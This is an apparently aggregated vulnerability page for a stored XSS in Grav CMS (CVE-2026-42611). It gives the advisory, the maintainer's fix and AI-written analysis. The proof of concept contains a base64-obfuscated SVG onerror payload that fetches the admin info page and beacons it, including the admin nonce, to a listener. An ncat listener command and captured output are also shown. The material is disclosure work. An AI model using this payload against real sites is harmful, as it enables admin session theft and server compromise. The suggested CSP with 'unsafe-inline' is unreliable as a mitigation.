Grav CMS CVE-2026-42611
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
A low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).
Details
Affected endpoint: admin/pages/<page> Affected code: system/src/Grav/Common/Security.php
public static function detectXss($string, array $options = null): ?string
{
// Skip any null or non string values
if (null === $string || !is_string($string) || empty($string)) {
return null;
}
if (null === $options) {
$options = static::getXssDefaults();
}
$enabled_rules = (array)($options['enabled_rules'] ?? null);
$dangerous_tags = (array)($options['dangerous_tags'] ?? null);
if (!$dangerous_tags) {
$enabled_rules['dangerous_tags'] = false;
}
$invalid_protocols = (array)($options['invalid_protocols'] ?? null);
if (!$invalid_protocols) {
$enabled_rules['invalid_protocols'] = false;
}
$enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });
if (!$enabled_rules) {
return null;
}
// Keep a copy of the original string before cleaning up
$orig = $string;
// URL decode
$string = urldecode($string);
// Convert Hexadecimals
$string = (string)preg_replace_callback('!(&#|\\\)[xX]([0-9a-fA-F]+);?!u', static function ($m) {
return chr(hexdec($m[2]));
}, $string);
// Clean up entities
$string = preg_replace('!(&#[0-9]+);?!u', '$1;', $string);
// Decode entities
$string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');
// Strip whitespace characters
$string = preg_replace('!\s!u', ' ', $string);
$stripped = preg_replace('!\s!u', '', $string);
// Set the patterns we'll test against
$patterns = [
// Match any attribute starting with "on" or xmlns
'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',
// Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols
'invalid_protocols' => '#(' . implode('|', array_map('preg_quote', $invalid_protocols, ['#'])) . ')(:|\&\#58)\S.*?#iUu',
// Match -moz-bindings
'moz_binding' => '#-moz-binding[a-z\x00-\x20]*:#u',
// Match style attributes
'html_inline_styles' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(style=[^>]*(url\:|x\:expression).*)>?#iUu',
// Match potentially dangerous tags
'dangerous_tags' => '#</*(' . implode('|', array_map('preg_quote', $dangerous_tags, ['#'])) . ')[^>]*>?#ui'
];
// Iterate over rules and return label if fail
foreach ($patterns as $name => $regex) {
if (!empty($enabled_rules[$name])) {
if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {
return $name;
}
}
}
return null;
}Specifically the line:
'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',assumes that the on_events will always begin with either whitespace, ', " which can easily be bypassed with a simple payload like:
<img src=x onload=alert('1')>
This XSS Filter practice is broken.
- Blacklisting every possible scenario that leads to XSS isn't possible.
- Regex can't parse HTML.
It would be better to use an HTMLPurifier.
PoC
Grav Core + Admin Plugin Grav Version: v1.7.49.5 - Admin v1.10.49.1
- Create a low-privileged user with only enough permission to login and perform CRUD on Pages.
- Login as the low-privileged user and browse to pages:
- Create a post with the following content:
<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7'))></foreignObject></svg>The payload base64 is decoded to:
(async()=>{let r=await fetch('/grav-admin/admin/config/info');let t=await r.text();navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)})();whenever a user with enough privilege visits the attacker-controlled page, a request will be made to the info endpoint and the response will be sent to attacker beacon/listener.
- Save
- Start a
ncatlistener on port8001.
┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).- Now as a Super Admin visit the
/of Gravhttp://localhost/grav-admin/for me:
- We get a response with the
admin-nonceand the entire system information:
┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).
POST /grav-log HTTP/1.1
Host: [127.0.0.1:8001](http://127.0.0.1:8001/)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: text/plain;charset=UTF-8
Content-Length: 127013
Origin: http://localhost/
Connection: keep-alive
Referer: http://localhost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Priority: u=6
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Configuration: Info | Grav</title>
<meta name="description" content="">
<meta name="robots" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" href="/grav-admin/user/plugins/admin/themes/grav/images/favicon.png">
<script type="text/javascript">
window.GravAdmin = window.GravAdmin || {};
window.GravAdmin.config = {
current_url: '/grav-admin/admin/config/info',
base_url_relative: '/grav-admin/admin',
base_url_simple: '/grav-admin',
route: 'info',
param_sep: ':',
enable_auto_updates_check: '1',
admin_timeout: '1800',
admin_nonce: '1265db72d897b4324cbe7d1781e66e3b',
<SNIPPED>Impact
This is a Stored Cross-Site Scripting (XSS) vulnerability exploitable by a low-privileged user, which leads to exfiltration of the admin session context, including the admin_nonce. This nonce can be abused to bypass CSRF protections and authenticate further requests to sensitive admin endpoints. Given Grav’s support for scheduled tasks and extensible plugin architecture, this can be escalated to Remote Code Execution (RCE) under favorable conditions.
Affected Component: Grav Core + Admin Plugin (v1.7.49.5 / v1.10.49.1) Impact: Full system compromise via RCE chain originating from low-privilege XSS.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Overall CVSS Score: 9.0 High Impact
---
---
Maintainer note - fix applied (2026-04-24)
Fixed in Grav core on the 2.0 branch: commit 5a12f9be8 - will ship in 2.0.0-beta.2. Two changes in tandem:
- Regex bypass (detection layer) - the
on_eventsregex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details. - Missing dangerous tags -
svg,math,option, andselecthave been added to defaultsecurity.xss_dangerous_tagsinsystem/config/security.yaml.svgandmathallow inline scripting through their XML namespace and event-handler surface;option/selectare the tags attackers use to break out of the admin's select-template context before dropping the payload.
Combined with the tightened on_events regex, the PoC <svg>…<script>…</script></svg> (and the GHSA-c2q3 </option></select><img src=x onerror=alert(1)> variant) now trip at least one detector.
Files:
system/config/security.yaml- dangerous-tags list extended.system/src/Grav/Common/Security.php- regex tightening.tests/unit/Grav/Common/Security/DetectXssTest.php.
AnalysisAI
Stored cross-site scripting in Grav CMS allows low-privileged users with page-creation permissions to inject malicious SVG payloads that execute when administrators view the page. The vulnerability stems from regex-based XSS detection that fails to catch unquoted event handlers and omits SVG/MathML from dangerous tags. Exploitation exfiltrates the admin-nonce token from /admin/config/info, enabling CSRF bypass and chained remote code execution through scheduled tasks or plugin endpoints. GitHub advisory GHSA-w8cg-7jcj-4vv2 confirms exploit details; patch available in Grav 2.0.0-beta.2 (commit 5a12f9be8). CVSS 8.9 (High) with network attack vector, low complexity, and scope change reflecting cross-context session hijacking.
Technical ContextAI
The vulnerability exists in Grav's custom XSS filter implemented in system/src/Grav/Common/Security.php. The detectXss() function uses regex blacklists to identify dangerous patterns, but the on_events pattern '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"…' requires whitespace or quotes around the equals sign, missing unquoted handlers like onerror=alert(1). Additionally, the default security.xss_dangerous_tags list omitted svg, math, option, and select elements. SVG and MathML (CWE-79: Improper Neutralization of Input During Web Page Generation) support inline scripting through XML namespaces and event attributes, bypassing HTML-centric filters. The affected Composer package pkg:composer/getgrav/grav versions below 2.0.0-beta.2 allow authenticated users with page-edit capability to embed <svg><foreignObject><img src=x onerror=…> payloads in Markdown content. When rendered, these execute JavaScript in the context of any visiting administrator, enabling session token theft and CSRF token (admin-nonce) exfiltration from protected endpoints.
RemediationAI
Upgrade to Grav 2.0.0-beta.2 or later, which applies commit 5a12f9be8314682c8713e569e330f11805d0a663 containing two complementary fixes: tightened on_events regex to catch unquoted event handlers, and expansion of security.xss_dangerous_tags to include svg, math, option, select in system/config/security.yaml. Download patch from https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663. For Grav 1.x deployments unable to migrate to 2.0 beta: manually backport the security.yaml dangerous-tags additions and restrict page-creation permissions to fully trusted administrators only. As compensating control, implement Content Security Policy headers with script-src 'self' 'unsafe-inline' to limit JavaScript execution scope (note this may break legitimate Grav admin features relying on inline scripts). Alternatively, disable the Admin Plugin's page preview feature and require admins to review page source in a sandboxed environment before publishing - this reduces UI:R likelihood but does not eliminate the vulnerability. Monitor /admin/config/info access logs for unexpected GET requests as detection signal. All mitigations except upgrade are incomplete; CSP in particular trades functionality for partial risk reduction.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-w8cg-7jcj-4vv2